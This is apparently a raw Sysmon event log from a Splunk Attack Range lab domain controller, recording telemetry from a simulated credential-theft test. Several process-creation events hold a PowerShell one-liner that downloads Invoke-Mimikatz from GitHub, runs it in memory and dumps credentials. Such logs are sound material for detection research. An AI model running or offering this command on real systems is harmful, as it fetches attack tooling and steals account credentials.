16:56:11.876{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_tdxfucga.ktl.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002243823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.853{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_tdxfucga.ktl.ps12021-03-02 16:56:11.853 23542300x80000000000000002243822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.842{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B07B67A3EAC2B3A9AAF4845B52755DA0,SHA256=EFC65112935876E32D2477ED6FAE69BF0C2325097AE06BFB29895B7CF84525B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.834{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002243820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:01.534{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55122- 10341000x80000000000000002243819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.795{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.792{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.792{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.792{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.792{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.791{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.791{05ADC7E1-6E2B-603E-F6AA-00000000AD01}108889924C:\Windows\system32\cmd.exe{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.791{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6E2B-603E-F6AA-00000000AD01}10888C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" 10341000x80000000000000002243811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.788{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E2B-603E-F6AA-00000000AD01}10888C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829F94433) 10341000x80000000000000002243810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.786{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E2B-603E-F6AA-00000000AD01}10888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.782{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.782{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.781{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.781{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.781{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6E2B-603E-F6AA-00000000AD01}10888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.780{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E2B-603E-F6AA-00000000AD01}10888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f535de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4ac19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4e1471(wow64) 154100x80000000000000002243803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.778{05ADC7E1-6E2B-603E-F6AA-00000000AD01}10888C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002243802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.777{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-02 16:56:11.776 11241100x80000000000000002243801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.776{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-02 16:56:11.773 23542300x80000000000000002243800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.632{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8030B58EC5EAC4ECA2BAEEE10B239CE9,SHA256=328EB044CD22AC3509E79142631D4C5CB51D8BBFFB084BB2EFAA1240E02FC402,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.277{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1CBC6383B406866E754F852C83F2340,SHA256=1E66B1B0C166D5840A04C640B59E9FAE9086A9DEC8C06910233B1706878FA8C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.092{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D2ACF56C8DAB19266DC453C809FDCF,SHA256=D9B7C3B8FD029C68EF28792FE8A950134AE7B195D57C5363B306B253F7097E36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.071{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\pwfzeeqj.dllMD5=3407963DECEF22F7C1CD4CCF97F02D4F,SHA256=1A41DE5A9173A673A78AB1328D74D58567BAC6D1F294269350BA8B9DD4BC4C42,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000002243796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.070{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\pwfzeeqj.cmdlineMD5=4CA90D4DF141527196100467CA129001,SHA256=65E2E9A1B0C6C25D97D6DF44502C1F890CF6824F444CF68CD893C270E9F3C631,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.069{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\pwfzeeqj.0.csMD5=10E9ABF0FAE68083CD0F74B09AFF5337,SHA256=D5A895B2362348B06CF4EEC1C6C912F9BA19E882023309237AA479EDC6E9834E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.068{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\pwfzeeqj.outMD5=EE30D807780476B25642D883F96E0116,SHA256=1786CB482733475DA49B0650B4F013C640D0BD4E17032E609B020E502495FECD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.045{05ADC7E1-6E2A-603E-F4AA-00000000AD01}14820ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\CSC877B13F5B1B340588E4C336B2712951.TMPMD5=EF9D28A84C1220CA840E2706F814D2C7,SHA256=88E8A0C911377E745E892D56EE8BE34CCEEAEF129626918AE00DD6CA9A9D1DF8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002243792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-02 16:56:11.045{05ADC7E1-6E2A-603E-F4AA-00000000AD01}14820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\pwfzeeqj.dll2021-03-02 16:56:10.951 23542300x80000000000000002243791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 